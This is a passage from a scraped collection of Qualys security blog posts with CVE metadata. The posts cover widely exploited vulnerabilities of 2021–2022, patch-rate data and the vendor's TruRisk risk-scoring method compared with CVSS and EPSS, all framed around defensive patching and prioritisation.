and VMware. The exploitation often resulted from organizations&#x27; failure to patch software or due to publicly available proofs of concept (PoC), enabling remote execution, privilege escalation, and authentication bypass. The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to compromise system integrity, confidentiality, and availability severely. The Qualys Threat Research Unit (TRU) team has addressed all aforementioned critical vulnerabilities by providing QIDs within 24 hours. These critical vulnerabilities are categorized based on their potential impact if exploited as follows: \n\nCVE/Vuln Name| Vendor/Product| Type| QID| QDS \n---|---|---|---|--- \nCVE-2018-13379| Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702| 100 \nCVE-2021-34473 (Proxy Shell) | Microsoft - Exchange Server | RCE | 50114, 50107| 100 \nCVE-2021-31207 (Proxy Shell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111| 95 \nCVE-2021-34523 (Proxy Shell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112| 100 \nCVE-2021-40539| Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840| 100 \nCVE-2021-26084| Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172| 100 \nCVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521| 100 \nCVE-2022-22954| VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521| 100 \nCVE-2022-22960| VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521| 95 \nCVE-2022-1388| F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577| 96 \nCVE-2022-30190 (Follina)| Microsoft - Multiple Products | RCE | 91909| 100 \nCVE-2022-26134| Atlassian - Confluence Server and Data Center | RCE | 376657, 730514| 100 \n \n**Vulnerabilities Paving the Way for Data Theft and More:** \n\nThe following vulnerabilities that could potentially lead to data theft or lay the groundwork for further attacks: \n\n * **CVE-2018-13379**, a flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data. \n * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as ProxyShell vulnerabilities affecting Microsoft Exchange Servers, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices. \n * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could offer initial network access to cyber criminals, enabling infamous activities like data theft or ransomware deployment. \n\n**Vulnerabilities Leading to System Takeover:** \n\nNext, the following vulnerabilities that could potentially compromise an entire system: \n\n * **CVE-2021-44228**, or Log4Shell, exploits Apache&#x27;s log4j Java library, possibly leading to a total system compromise. \n * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities found in Atlassian&#x27;s Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover. \n * **CVE-2021-40539**, an issue with Zoho ManageEngine ADSelfService Plus, can allow for arbitrary code execution and potential system compromise. \n * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise. \n * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow for remote code execution and privilege escalation, respectively, potentially leading to full system compromise. \n\n### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**\n\nOur data, which sheds light on the patching behavior for 12 significant vulnerabilities, is pulled from the Qualys TruRisk Platform. This data is anonymized to ensure that any data analysis cannot revert to identifying specific organization or asset information. \n\nThe data highlights a prominent challenge where some vulnerabilities witness rapid mitigation, highlighting proactive security measures. In contrast, others face prolonged remediation times, raising concerns about potential exposure risks. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot contrasting the patch rates and remediation times for 12 frequently exploited vulnerabilities in 2022 further illustrates this point. It shows that while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This analysis reinforces the importance of timely vulnerability management and the pressing need to do so with speed and diligence, especially for high-risk vulnerabilities. \n\n\n\nFig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022 \n\nThe damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights. \n\n### **Aligning Qualys Platform with Joint Cybersecurity Advisory Mitigating Guidelines** \n\nThe recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are the timely updating of software, prioritizing patches for known vulnerabilities, performing automated asset discovery, and implementing centralized patch management. \n\nQualys&#x27; suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) ensures 360-degree visibility of assets, aligning with CSA&#x27;s call for comprehensive asset discovery. Qualys Patch Management offers an advanced automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys&#x27; unified platform, organizations can efficiently adhere to international best practices outlined in the CSA, enhancing their defense against cyber threats. \n\nIn addition, the joint Cybersecurity Advisory (CSA) stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection. \n\nQualys Threat Protection aligns seamlessly with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats. Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys empowers organizations to align with the CSA&#x27;s guidelines and achieve a fortified security posture. \n\nQualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It is leveraging an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments and bypassing the limitations of signature-based systems. \n\n\n\nFig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022 \n\nThe [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (JSON zipped) helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score, high-risk vulnerabilities, and Top Exploited Vulnerabilities. Once you identify the vulnerable assets for these top vulnerable CVEs prioritized among your remediation owners, you can instantly use Qualys Patch management to reduce the risk. \n\nIn conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routine vulnerabilities. Qualys provides robust solutions that align seamlessly with CSA&#x27;s recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities in this growing landscape. Consequently, organizations can strengthen their defenses against cyber threats by sticking to CSA guidelines and leveraging comprehensive cybersecurity solutions like Qualys&#x27;. \n\n## References\n\n[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)\n\n## Additional Contributor \n\n * Ramesh Ramachandran, Principal Product Manager, Qualys\n * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-24T19:07:05", "type": "qualysblog", "title": "Qualys Tackles 2022\u2019s Top Routinely Exploited Cyber Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-24T19:07:05", "id": "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "href": "https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T22:50:52", "description": "Vulnerability Management is a foundational component of any cybersecurity program for the implementation of appropriate security controls and the management of cyber risk. Earlier this year Qualys introduced the latest iteration of its vulnerability management product [VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) which focusses on helping organizations understand and manage cyber risk. Qualys TruRisk assesses risk by taking into account multiple factors such as evidence of vulnerability exploitation, asset criticality, its location, and evidence of compensating controls on the asset among many other factors to assess the accurate risk posture for an organization.\n\nIn this blog we do a deep-dive into the vulnerability prioritization algorithm for TruRisk, compare it to existing vulnerability scoring systems, such as Common Vulnerability Scoring System (CVSS) and Exploit Prediction Scoring System (EPSS), to demonstrate why TruRisk is a better method for prioritizing risk than existing methods. This blog is the first of many blogs focused on different aspects of TruRisk, with other aspects covered in later blogs.\n\n### **Key Takeaways**\n\n * Since 2016, every subsequent year has reported more vulnerabilities than the year before (on average 8%-10% more)\n * CVSS based prioritization results in 51% of vulnerabilities marked as high or critical which leads to ineffective, low-value prioritization\n * Less than 3% of vulnerabilities have weaponized exploits or evidence of exploitation in the wild, two attributes posing the highest risk.\n * Exploit Prediction Scoring System (EPSS) is a step in the right direction to predict vulnerability exploitation. However, it still ranks some vulnerabilities that are actively exploited with a lower probability of exploitation\n * Qualys TruRisk helps organizations prioritize risk by focusing on exploitability, evidence of exploitability, and likelihood of exploitability resulting in up to 85% fewer vulnerabilities to prioritize compared to CVSS.\n\nQualys TruRisk brings asset context, threat context and vulnerability intelligence data under one platform empowering IT and security teams to make better, informed prioritization decisions.\n\nBut first let\u2019s talk about few key challenges.\n\n### Vulnerabilities Are on the Rise\n\nEvery year since 2016, (see Fig. 1) the number of the vulnerabilities reported by NIST has been greater than the year before. According to the [National Vulnerability Database](<https://nvd.nist.gov/vuln/search/statistics?form_type=Basic&results_type=statistics&search_type=all&isCpeNameSearch=false>) (NVD) the number of vulnerabilities reported in 2022 (18,841) has already surpassed the vulnerabilities reported in 2020. And we still have three months to go.\n\nFigure 1: Number of Vulnerabilities by Year (Source: NVD)\n\n### **Vulnerability Threat Landscape**\n\nAs the number of vulnerabilities increase, so does the risk to enterprises. But not all vulnerabilities are created equally. Some vulnerabilities pose greater risk to organizations than others. For example, less than 3% of the vulnerabilities have exploit code weaponized. It is crucial to prioritize vulns like these, that are some of the most critical vulnerabilities first. \n\nFigure 2: Vulnerability Threat Landscape\n\nTraditionally, organizations have relied on CVSS scores for prioritization. However, as we will see in the next section, there are limitations in using CVSS as the only vulnerability prioritization method.\n\n### Challenges With CVSS Based Prioritization \n\nThe **Common Vulnerability Scoring System (CVSS) was introduced in the early 2000s to address the need for **a common method to rate the severity of vulnerabilities. Previously, two researchers could rate the same exact vulnerability in different ways based on their subjective understanding of the vulnerability. This created confusion for security practitioners because they could not accurately determine the actual severity of vulnerabilities. The CVSS system was developed to address this issue by enabling the uniform _technical_ severity assessment of vulnerabilities.\n\nA key factor to keep in mind is CVSS only calculates the technical severity of the vulnerability, not the risk it poses to an organization. Over time, CVSS has been used as a proxy for determining the risk a vulnerability posed to the organization, leading to unintended consequences. This includes patching cycles spent fixing countless vulnerabilities with a CVSS score of 7.5 or higher, while some medium severity vulnerabilities were deprioritized even if they posed a greater risk.\n\nCVSS scores are categorized into four categories low, medium, high, critical. \n\nCVSS Score| CVSS Severity \n---|--- \n0.1 \u2013 3.9| Low \n4.0 \u2013 6.9| Medium \n7.0 \u2013 8.9| High \n9.0 \u2013 10.0| Critical \n \nFigure 3: CVSS Score distribution grouped by CVSS severity\n\nAs shown in Fig.3, **51% (96,340) of the total vulnerabilities are categorized as Critical or High according to CVSS scores**. However, empirical research shows that not all the vulnerabilities in these CVSS score buckets need equal/high attention. The main issue is that CVSS base scores don\u2019t consider threat information like active exploitation in the wild, likelihood of the exploitation in the wild, activity associated with it in dark web or social media, known exploit categorized by CISA, threat actors associated, etc.\n\nAs shown in Fig. 4, as expected known exploited vulnerabilities (as categorized by [CISA Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) are concentrated at higher CVSS scores (the red dots indicate CISA KEV vulnerabilities).\n\nHowever, there are a significant number of exploits discovered even for lower CVSS scores. For example, **there are 92 out of 832 (11%) CISA_KEV vulnerabilities that have a CVSS score of less than 7.** This could be an issue when relying only on CVSS scores.\n\nFigure 4: CISA known vulnerabilities distributed across CVSS score.\n\n### **Exploit Prediction Scoring System**\n\nTo address challenges related to lack of threat context in the CVSS scoring system, first.org in recent years introduced [Exploit Prediction Scoring System (EPSS)](<https://www.first.org/epss/>), an open, data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild. This is a step in the right direction. EPSS\u2019s goal is to help network defenders better prioritize vulnerability remediation efforts. The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.\n\nAs evidenced by Figure 5. EPSS helps highlight vulnerabilities with high likelihood of exploitation and correlates well with CISA KEV vulnerabilities.\n\nFigure 5: EPSS Score and CISA Known Vulnerabilities distribution across CVSS score\n\nFigure 6: EPSS Score distribution\n\nThe availability of patches also plays a key role in EPSS scores. If patches are available, the probability of exploitation is ranked lower. Many of the CISA Known Vulnerabilities are scored lower in EPSS if they have patches/fixes available. However when prioritizing what to patch first, we need to consider the whole set, not just the ones with patches. For example, consider the following recent vulnerabilities which have low EPSS scores. If we rely only on EPSS to prioritize them, they will not show up in a priority list of vulnerabilities to be remediated. Several examples of vulnerabilities with low EPSS scores and high TruRisk scores are shown in Figure 5.\n\nCVE| Title| EPSS| TruRisk (QVS) \n---|---|---|--- \nCVE-2021-36942| PetitPotam| 0.26| 95 \nCVE-2021-31207| Proxyshell| 0.02| 95 \nCVE-2021-34523| Proxyshell| 0.16| 100 \nCVE-2022-30190| Follina| 0.69| 100 \nCVE-2016-3351| Microsoft Edge Cumulative Security Update (MS16-105)| 0.24| 95 \n**Critical CVEs with patches available scoring low on EPSS**\n\n### **Qualys Severity Levels**\n\nGiven the challenges with CVSS scores, the Qualys research team introduced [Qualys severity levels](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/knowledgebase/severity_levels.htm>) to assess the severity of Qualys IDs (QIDs). In addition to determining the risk associated with exploitation, Qualys severity levels also focus on potential consequences of vulnerability exploitation from an attacker\u2019s point of view. Each QID severity level is reviewed by the Qualys Research Team, including taking vulnerability chaining, server-side vs client-side vulnerabilities, and information from various threat-intel sources to accurately assess them into consideration.\n\nQualys severity levels are an improvement over CVSS as they helped customers quickly prioritize critical vulnerabilities as can be seen in Fig. 7. \n\nFigure 7: Qualys Severity Level Distribution (Source: Qualys)\n\n### Qualys TruRisk, a Data-Driven Way To Prioritize Risks\n\nAll of the scoring mechanisms presented so far are attempting to answer one key question\n\n_What should defenders focus on first?_\n\nEach model attempts to answer the question in its own way but falls short of its goal. Organizations need a better way to respond quickly and prioritize vulnerabilities based on risk.\n\nTo address these challenges Qualys introduced [Qualys VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) earlier this year to help organizations prioritize vulnerabilities, assets, and groups of assets based on risk. \n\nQualys VMDR with TruRisk is powered by one of the most comprehensive exploit and threat intelligence databases. It spans over 185k CVEs, and 25+ unique threat and exploit intelligence sources such as Metasploit, Canvas, CISA KEV, and even Github, which is increasingly becoming the go-to place to publish exploits.\n\nWith TruRisk, organizations can pinpoint which CVEs are exploited in the wild (even those that don&#x27;t have a QID) and which malware, ransomware, or threat actor groups are exploiting them. These insights can then be used to prioritize vulnerabilities based on risk.\n\nLet\u2019s take a closer look into how the TruRisk algorithm works, and how it compares to CVSS and EPSS.\n\nTo determine risk, Qualys TruRisk vulnerability scores rely on multiple factors to build the most accurate risk profile for a vulnerability.\n\n**Qualys Vulnerability Score (QVS)** is a Qualys-assigned score for a vulnerability based on multiple factors associated with the CVE such as CVSS and external threat indicators like active exploitation, likelihood of vulnerability being exploited in wild, sighting in the darkweb and social web, exploit code maturity, CISA known exploitable and many more. \n \n**Qualys Detection Score (QDS)** is assigned to QIDs by Qualys. QDS has a range from 1 to 100. If multiple CVEs contribute to a QID, the CVE with the highest score is considered for the QDS calculation. \n \n**Asset Risk Score (ARS)** is the overall risk score assigned to the asset based on the following contributing factors such as Asset Criticality Score (ACS), QDS scores for each QID level, Auto-assigned weighting factor (w) for each criticality level of QIDs, number of vulnerabilities on an asset.\n\nHere is the list of inputs that go into the algorithm.\n\n### **CVSS Base Score**\n\nThe CVSS base score serves as one of the key inputs to assess the risk of the vulnerability. CVEs with higher CVSS base scores are rated higher than those with lower scores. But a high CVSS score alone doesn\u2019t result in a high TruRisk risk score. Evidence of exploitation or weaponized exploit code maturity is required for the CVE to fall in the critical range.\n\n### **CISA Known Exploited Vulnerability (KEV)**\n\nVulnerabilities that are catalogued by CISA as known exploited vulnerabilities that are actively being exploited in the wild are included in the algorithm\n\n### **Real-Time Threat Indicators (RTIs)**\n\nThe TruRisk algorithm considers the type of vulnerability. For example, is it a Denial-of-Service (DoS) vulnerability or a remotely exploitable vulnerability? In the case of remote vulnerability or a web application vulnerability, the risk is rated higher. Other RTI\u2019s such as zero-day, active attacks, high data loss, high lateral movement, etc. that are collected from various threat feeds are also considered by the algorithm.\n\n### **Exploit Code Maturity **\n\nThe TruRisk algorithm analyzes the exploit code maturity for the given vulnerability. The exploit code maturity could be a Proof-of-Concept (PoC) which suggests a theoretical exploit exists. The exploit may already work against systems, or it could be weaponized, in which case the exploit code is considered very mature and can be easily used to compromise a system. The QDS algorithm rates weaponized exploits higher than PoC exploits. \n\n### **Malware **\n\nThe TruRisk algorithm checks to see if the vulnerability is being actively exploited by malware. If it is, then the risk is rated higher.\n\n### **Threat Actors / Ransomware Groups**\n\nThe TruRisk algorithm validates if any threat actors or ransomware groups are actively exploiting the vulnerability. If that is the case, the risk is rated even higher than if it only being exploited by malware. \n\n### **Trending Risk**\n\nThe TruRisk algorithm checks if the vulnerability has been actively exploited in the last 14 days by monitoring the Dark Web, social media, GitHub accounts, and many other similar sources. The risk is further increased if the vulnerability is determined to be trending and exploited in the wild. \n\n### **Applied Mitigation Controls**\n\nThe algorithm correlates the risk from the vulnerability with intelligence related to the asset to assess whether the vulnerability represents a threat to it. For example, the vulnerability may exist on the asset, but the system may have mitigation controls already applied which greatly reduce the risk of exploitation of the vulnerability in the customer\u2019s specific environment. \n\n### **EPSS Score (from First.org)**\n\nQualys TruRisk also leverages [EPSS](<https://www.first.org/epss/model>) scores which predict the probability of a vulnerability being exploited in the next 30 days. Vulnerabilities with a higher EPSS score are ranked higher.\n\nFigure 8: Contributing factors to Qualys TruRisk Scores\n\n### How Does Qualys TruRisk Compare Against CVSS and EPSS?\n\nAs customers adopt Qualys TruRisk to address their prioritization needs they want to know how CVSS and EPSS and TruRisk compare.\n\nQualys TruRisk is hyper focused on three attributes: exploit availability, evidence of exploitation in the wild, and likelihood of exploitation. This helps organizations focus on the highest risk vulnerabilities.\n\nQualys TruRisk rates less than 1% of vulnerabilities as critical, and less than 7% of vulnerabilities as high. This drastically reduces the number of vulnerabilities (up to 85% fewer compared to CVSS which ranks 51% of vulnerabilities high or critical) that organizations need to focus on to reduce risk. See Fig. 9.\n\nClearly organizations need to remediate other vulnerabilities as well. However, when deciding where to begin, we recommend starting with vulnerabilities that have a TruRisk-QDS risk score of 70 or higher. \n\n### **Qualys Vulnerability Score (QVS) vs CVSS**\n\nFigure 9: Distribution of TruRisk (QVS) Scores vs CVSS\n\n### **Qualys TruRisk vs EPSS**\n\nThe following figure (Fig. 10) shows the distribution of EPSS scores with Qualys Vulnerability Scores (QVS) and CISA known vulnerabilities. QVS scores consistently place vulnerabilities with evidence of exploitation, such as CISA known vulnerabilities, in a higher score range even if the EPSS score is low as annotated in the figure below.\n\nFigure 10: EPSS Score vs TruRisk (QVS) Score\n\n### **Qualys TruRisk (QVS) vs CISA KEV**\n\nEvidence of vulnerability exploitation from sources such as a CISA KEV and other threat intelligence sources tracked by the Qualys research team play a key role in determining the risk of a vulnerability.\n\nAs seen below, vulnerabilities that appear in CISA Known Exploited Vulnerabilities are consistently scored higher (QVS scores of 90 or higher) by the Qualys TruRisk algorithm. (fig. 11).\n\nFigure 11: CISA Known Vulnerabilities distributed across QVS score.\n\nLet&#x27;s take the example of CVE-2021-36942 (the Windows LSA Spoofing Vulnerability). It is rated at 5.3 by the National Vulnerability Database (NVD), but it\u2019s actively exploited today by malware groups and threat actors. The exploit code maturity is weaponized, making it easy for attackers to exploit the vulnerability to compromise and infect systems). Qualys TruRisk ranks CVE-2021-36942 vulnerability as critical given its exploit availability and evidence of exploitation in the wild.\n\n\n\n### **How to Interpret Qualys TruRisk Scores**\n\nQualys TruRisk builds the vulnerability risk profile of vulnerabilities, assets, and asset groups by using the following three risk scores:\n\n**Qualys Vulnerability Score (QVS)** \u2013 QVS is assessed at each CVE level based on the external threat and exploit intelligence factors listed above. It is also computed for vulnerabilities that don\u2019t have Qualys vulnerability detection signatures (QIDs). These QVS scores can be individually queried for insights from our [dedicated API endpoint](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>).\n\n**Qualys Detection Score (QDS)** \u2013 QDS is assessed at each QID level. This is the score customers need to focus on for their vulnerability prioritization needs. **QDS builds on the QVS score by adding two key aspects**. Some QIDs can be mapped to multiple CVEs. QDS selects the highest QVS of all associated CVEs to that QID. Next, QDS accounts for any compensating/mitigation controls that are applied to an asset to reduce the risk score for a given vulnerability. For example, QDS will reduce the risk of a Remote Desktop Protocol (RDP) vulnerability if RDP is disabled.\n\nQDS/QVS Range| Description \n---|--- \n&gt;=95| CVSS critical, exploited in the wild, has weaponized exploit available, trending risk on social media, dark web. \n90-95| CVSS critical, weaponized exploit available, and evidence of exploitation by malware, threat actors/ransomware groups \n80-89| CVSS Critical, weaponized exploit available, but no evidence of exploitation. \nCVSS Critical with evidence of exploitation, but mitigation in place. \n70-79| CVSS High, weaponized exploit available, but no evidence of exploitation \n60-69| CVSS critical, no exploits available \n50-60| CVSS High, a Proof of Concept (PoC) exploit is available \n40-50| CVSS High, no exploit available \n30-39| CVSS Medium, a PoC exploit is available \n1-30| CVSS Low vulnerabilities, low risk of exploitation \n \n### **Asset Risk Score (ARS) **\n\nQualys TruRisk\u2019s next type of risk score allows organizations to identify the riskiest assets in their organization. To assess the risk an asset poses to an organization, the** Asset Risk Score** considers multiple factors.\n\nThe primary factor considered by ARS is Asset Criticality, ie, what risk the asset poses based on its business value. For example: Is the asset part of a production system, a system hosting a production database, or is it purely an internal system used for development and test purposes. Production assets should be rated higher than test systems.\n\nQualys TruRisk determines the business criticality of the asset using multiple approaches, including: \n\n * **Manual** **Ratings **\u2013 TruRisk allows users to set the criticality of the system by using asset tags \n * **Synchronization with CMDB** \u2013 Most enterprises store business criticality information for assets in a configuration management database. Qualys automatically maps to CMDB data to determine the criticality of the system \n * **API\u2019s \u2013 **Using [Qualys APIs for Asset Management and Tagging](<https://www.qualys.com/docs/qualys-asset-management-tagging-api-v2-user-guide.pdf>), users can assign business criticality to an asset \n\nFinally, TruRisk analyzes the vulnerabilities found on the system and determines the asset\u2019s risk based on the QDS scores of the vulnerabilities on an asset by a clearly defined formula called the Asset Risk Score formula.\n\n### **Asset Risk Score Formula**\n\nThe Asset Risk Score (ARS) is calculated using the following formula: \n \n \n ARS Score = ACS Score * [wc * Avg (QDS for Critical Vuln) * f (Critical vuln count) + \n \n wh * Avg (QDS for High Vuln) * f (High vuln count) + \n \n wh * Avg (QDS for Medium Vuln) * f (Medium vuln count) + \n \n wh * Avg (QDS for Low Vuln) * f (Low vuln count)] * I(External) \n\nIn the above formula, **_ACS _**is Asset Criticality Score, **_w__**are the weights fine-tuned by TruRisk algorithm to multiply each of the severity, function **_f_**_ ()_, is a non-linear function that increases exponentially as number of vulnerabilities increases. Also, the factor **_I(External)_** is for the case where an asset is external facing or discoverable by Shodan. This factor increases the score appropriately for external facing assets.\n\nARS Range| Severity| Description \n---|---|--- \n850-1000| Critical| Critical asset with multiple critical or high vulnerabilities \n700-849| High| High value asset with multiple number of critical or high vulnerabilities or is exposed to the internet \n500-699| Medium| Moderate value asset with critical or high vulnerabilities \n0-499| Low| Low value asset with multiple vulnerabilities \n \n### Conclusion\n\nQualys TruRisk offers organizations a comprehensive approach to risk prioritization by considering multiple factors such as vulnerability exploitation, presence of compensating controls, asset criticality, its location (internal or external) to name a few to paint an accurate picture of organization\u2019s TruRisk (pun intended). In this blog we did a deep-dive into one aspect of TruRisk (vulnerability prioritization) and showcased how it\u2019s better than existing models. This blog is the first of series of blogs around TruRisk, and in subsequent blogs we will do a similar deep-dives into other aspects of TruRisk for e.g. asset risk, asset group risk, misconfigurations and many more to help organizations prioritize better based on risk.\n\nWith Qualys TruRisk we have introduced foundational building blocks for major cyber risk initiatives like peer benchmarking, risk score customization, third-party risk assessment, and many more. We are very excited about TruRisk and the benefits it provides to our customers. Stay tuned for more updates.\n\n### Additional Contributors\n\n 1. Shreya Salvi, Data Scientist, Qualys\n 2. Mehul Revankar, VP, Product Management &amp; Engineering for VMDR, Qualys\n 3. Payal Mehrotra, Senior Director, Product Management for CyberRisk, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-10T14:32:29", "type": "qualysblog", "title": "In-Depth Look Into Data-Driven Science Behind Qualys TruRisk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3351", "CVE-2021-31207", "CVE-2021-34523", "CVE-2021-36942", "CVE-2022-30190"], "modified": "2022-10-10T14:32:29", "id": "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity &amp; Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity &amp; Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability&#x27;s disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService 